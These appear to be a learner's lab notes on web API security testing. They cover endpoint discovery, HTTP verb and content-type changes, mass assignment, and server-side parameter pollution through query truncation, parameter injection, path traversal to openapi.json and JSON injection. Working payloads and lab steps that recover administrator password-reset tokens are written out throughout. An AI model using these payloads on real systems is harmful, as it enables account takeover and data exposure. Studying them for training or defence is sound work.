[TOC]
Wait to learn:
Easiest way to find hidden api from js files
https://medium.com/@jeetpal2007/easiest-way-to-find-hidden-api-from-js-files-ce115a4ad1af
API discovery Tools
https://github.com/akto-api-security/akto
# API Vulnerabilities
API (Application Programming Interface)
# Discovering API Endpoint
- Site Map -> Dynamic Endpoints
- DevTools(F12) -> Networks
- Javascript - fetch Function Or Using Js link Finder
If we found /api/swagger/v1/books/1
we should investigate the following Path
- /api
- /api/swagger
- /api/swagger/v1
or
Fuzzing
- /api/swagger/v1/FUZZ
- /api/swagger/v1/bools/FUZZ
## Analysis Front(js) code
GPT Prompt
```
幫我分析可能的fetch 請求Path , 所需要的parameter , HTTP verb
${Replace here with JS Fetch Code}
```
# Reading API Document (If we encounter General Error Message!)
It can save a lot of time to try and error.
## Discovering Doc
Document potential path !
Document Endpoint Wordlist : https://raw.githubusercontent.com/z5jt/API-documentation-Wordlist/main/api-documentation-endpoint1.txt
```
/api
/swagger/index.html
/openapi.json
```
We can also use the Burp Scanner tool to automatically crawl the target, testing potential file or paths.
## LAB Found Hide API Document
### Mapping the Target
### Identify
Our next step is to locate API document, We perform testing path.
Testing sub-paths.
### Exploit
# Interaction with API endpoint
## API Investigation
- Require Parameter ?
- Support HTTP Methods ?
GET
POST
PATCH : Data Modify
DELETE
OPTIONS Allowed methods
- Authentication ?
## Modify Content Type (Header)
API endpoints usually expect data in specific form.
We can intend to Modify the data type to trigger Unexpected Behavior !
- Information Disclose
- Bypass flawed defense
- Take advantage of differences in processing logic.
Json -> Not susceptible Inject Attack
XML (Modify) -> susceptible Inject Attack
For example, an API may be secure when handling JSON data but insecure when handling XML.
Extension: Content Type Converter
### LAB: Enumerate HTTP verb / Converting Content Type
#### Mapping the target
- [x] Crawl the Target (auto/manual)
- [x] Testing Post
#### Analysis Attack Surface
Analysis API endpoint
GET /api/products/1/price
If we can modify the data through the PATCH or PUT method via the API, this source might be controllable!
==Discovering the API document==
Not Found
GET /resources/js/api/productPrice.js
```htmlembedded=
...
const setPrice = (price) => {
document.getElementById('price').innerText = price;
};
...
const loadPricing = (productId) => {
const url = new URL(location);
fetch(`//${url.host}/api/products/${encodeURIComponent(productId)}/price`)
.then(res => res.json())
.then(handleResponse(getAddToCartForm()));
};
....
```
#### Identify
Fuzzing
Testing HTTP method
#### Exploit
Modifying the product price using PATCH:
```
PATCH
```
Solved !!
# Fuzzing the Hidden Parameters
When we analysis API endpoint, It's possible that the API support undocumented parameter
- Param miner
- Intruder
## Auto-binding (Massive Assignment) Vulnerability
### Arise
When the software framework automatically bind request parameter on the property in internal object, It will result unexpected behavior, such as Privilege Escape
Vuln Code
### LAB-Exploit A Mass Assignment Vulnerability
#### Mapping Target
- [x] Crawl the Target
- [x] Testing post
#### Analysis Attack Surface
Analysis APi endpoint
Discovering API endpoint document
#### Identifying
Identifying supported HTTP Methods
```
GET
POST
```
Identify Hidden parameter
### Exploit
# Server-Side Parameter pollution
Website embeds user input in Server-side request to an internal API without adequate encoding and verifying.
- Query parameter
- From
- Header
- URL Path
## SSPP - Query String
Testing Char `#, &, =`
### Exploit - Truncating `#`
Payload `%23trncateHaHa`
Using `#` attempt to truncate the internal API request.
```
User Reqeust
GET /userSearch?name=mwoehcker%23trncateHaHa&back=/home
Server Side
GET /internal-api/user/serach?name=mwoehcker%23trncateHaHa&publicProfile=true
```
Invalid username or No User -> No truncate
### Inject Parameters
#### 1.Inject Invalid Parameters
`&` -> `%26`
Using `&` attempt to inject invalid parameter
Payload: `%26invalidPara=hack`
```
Original Request
GET /userSearch?name=mwoehcker&back=/home
Inject Parameters reqeust
GET /userSearch?name=mwoehcker%26invalidPara=hack&back=/home
GET /interal-api/user/serach?name=mwoehcker&invalidPara=hack&publicProfile=true
```
name=mwoehcker%26invalidPara=hack -> (If `%26` not be converted to & -> Query may display message that user not found !)
#### 2.Inject valid parameter
Fuzzing hidden parameters and attempt to inject valid parameters
Use a tool like Param Miner
FUZZ -> Email !
```
GET /userSearch?name=mwoehcker%26email=meow&back=/home
```
Payload: %26validpara=meow`
Server Side API
```
GET /Internal-api/user/serach?name=mwoehcker%26email=meow&publicProfile=true
```
Observation -> Response
### Overriding Exists Parameter
Payload: `%26para=value`
If Application can tolerate double Parameter, we can attempt overriding to retrieve sensitive information.
PHP -> Valid (PHP will retrieve data flowing last parameter Value)
ASP.NET -> vale1,vale2
Node.js -> Invalid
```
GET /userSearch?name=peter%26name=admin&back=/home
GET /users/search?name=peter&name=admin&publicProfile=true
```
### LAB - SSPP / Parameter Truncate + Injection / Fuzzing Hide Parameter Fuzzing / js reset_toke Parameter Leak !
#### Mapping the Target & Recon
#### Finding Attack Surface
API Endpoint
`static/js/forgotPassword.js`
==Search API Document==
Not Found !!
==Support Method==
```
GET
POST
```
We can attempt to testing Server-Side parameter pollution
#### Identify
Truncating Query String
`#` -> `%23`
```
csrf=9lVogVXVmKXQxX3H8DQkvtYiKDkgzzSd&username=administrator%23
```
Truncating the Rest of the Request Parameters
==To find remain parameter are request fiedl=???????(API parameter)==
Identifying whether allow us inject parameter in the API endpoint query.
```
csrf=9lVogVXVmKXQxX3H8DQkvtYiKDkgzzSd&username=administrator&a=b
```
Invalid filed name !!
TO inject valid parameter
Parameter miner -> dig Hide parameter
Look up the front-end JavaScript Code
Using invalid filed
```
csrf=9lVogVXVmKXQxX3H8DQkvtYiKDkgzzSd&username=administrator&field=b#
```
Fuzzing API parameter
```
csrf=9lVogVXVmKXQxX3H8DQkvtYiKDkgzzSd&username=administrator&field=a#
```
we can attempt find another sensitive Parameter
#### Exploit
We can use 'rest_token' to reset administrator password
Token
```
inwya45cb0o5v7u6fty5isuy1y21accr
```
Solved !!
## SSPP - REST Path
RESTful API may replace query string with place the parameter in URL Path
We can attempt combine Path traversal to exploit REST Path API
Initial request from the browser
```
GET /userAccount.php?name=meowhecker
REST PATH API
GET /api/private/user/meowhecker
```
Attack can using path traversal attack to exploit this vulnerability, as the following request
```
GET /userAccount.php?name=meowhecker../admin
```
```
GET /api/private/user/meowhecker%2f%2e%2e%2fadmin
```
The API will parse it as:
```
/api/private/user/admin
```
## LAB- REST PATH API / SSPP / PATH Traversal / FUZZING API Document / Old Version API / Exploit -> Front-end valid Parameters
### Mapping target & RECON
### Finding Attack Surface
==API endpoint==
==Finding API document==
not found
== Reset password Functionality==
It seemly require passwordResetToken token, it will redirect user to reset password page!!
We can further test the API endpoint.
### Identify API endpoint
Identify Supported HTTP method
```
GET
POST
```
==Truncating URL testing==
Testing normal invalid username error
```
csrf=9ZWcEhOqcoztiSquFDoOeb28rePGXNOI&username=notExsistsUser
```
Normal valid username
```
csrf=9ZWcEhOqcoztiSquFDoOeb28rePGXNOI&username=administrator
```
```
GET /api/.../user/adimistrator# /?file?/
```
Truncated the remain parameter.
The API response invalid Routing Error!!!
According error message, the internal API seem to use RESTful Path as parameter to retrieve specific user data.
==Inject Invalid parameter via '&'==
payload
```
%26a=b
```
This URL will be parsed as `&a=b` in the pathname:
```
/api/..../{administrator&a=b}/~~/~~
```
Invalid routing
```
/api/..../{administrator?}/~(ignore)~/~(ignore)~
```
We could ensure the parameter (controllable) is in the RESTful URL. That is, we truncating remain path they are invisible, resulting in Invalid routing.
==Exploit directory traversal to Find out the API definition==
According input transform issue, we can attempt directory traversal
```
administrator%2f..%2f%23
```
```
administrator%2f..%2f..%2f%23
```
```
administrator/../../../../../
```
We can turn back the layer of the directory to the root directory by 4 layers.
Root Directory Deep:
```
/??/??/??/??/{username}
```
we could find the API document or setting in those layers using Intruder to fuzz.
```
administrator%2f..%2f..%2f..%2f..%2f§apiDefinitionFilenames§%23
```
Fuzzing API Document
```
ffuf -request-proto https -request req -w ./api-documentation-endpoint1.txt -fs 250
```
payload
```
..%2f..%2f..%2f..%2fopenapi.json%23
```
API Error Message
```
Error: Unexpected response from API server:
{
"openapi": "3.0.0",
"info": {
"title": "User API",
"version": "2.0.0"
},
"paths": {
"/api/internal/v1/users/{username}/field/{field}": {
"get": {
"tags": ["users"],
"summary": "Find user by username",
"description": "API Version 1",
"parameters": [
{
"name": "username",
"in": "path",
"description": "Username",
"required": true,
"schema": {
"type": "string"
}
},
{
"name": "field",
"in": "path",
"description": "Field name",
"required": true,
"schema": {
"type": "string"
}
}
],
"responses": {
"200": {
"description": "Successful operation",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/User"
}
}
}
},
"400": {
"description": "Invalid username or field supplied"
},
"404": {
"description": "User not found"
}
}
}
}
}
}
```
```
csrf=sfDbTrRnroRtspmXGJwsreZirIlLnotk&username=administrator%2ffield%2fmeow%23
```
```
csrf=sfDbTrRnroRtspmXGJwsreZirIlLnotk&username=administrator%2ffield%2femail%23
```
```
..%2f..%2fv1%2fusers%2fadministrator
```
Inspect Front End code to Find out Valid Parameter
```
passwordResetToken
```
```
..%2f..%2fv1%2fusers%2fadministrator%2ffield%2fpasswordResetToken%23
```
```
3w2pcwfca42y69ojoegeeps6nc6pom5g
```
Solved !!!
## SSPP - XML / JSON
For example
For example, if a user wants to rename their account, our browser will send a request as follows:
```
User Request
POST /myaccount
name=meowhecker
The internal API
PATCH /user/123/update
{"name":"meowhecker"}
```
### Injecting parameter
Json Encode `"` -> `\"`
Payload = `\",\"valideParamter\":\"Value`
```
POST /myaccount
name=meowhecker\",\"access_level\":\"administrator
Interal API
PATCH /user/123/update
{"name":"meowhecker", "AcccessLevel":"admin"}
```
## Testing Input with a Scanner
When we identify suspicious input transformations where the server decodes or processes the user's original input, this behavior allows us to bypass flawed filters by encoding our malicious input.
Extension: Backslash Powered Scanner BApp
Suspicious input transformation(reflected)
https://portswigger.net/kb/issues/00400d00_suspicious-input-transformation-reflected
Sign in with Wallet
Connect another wallet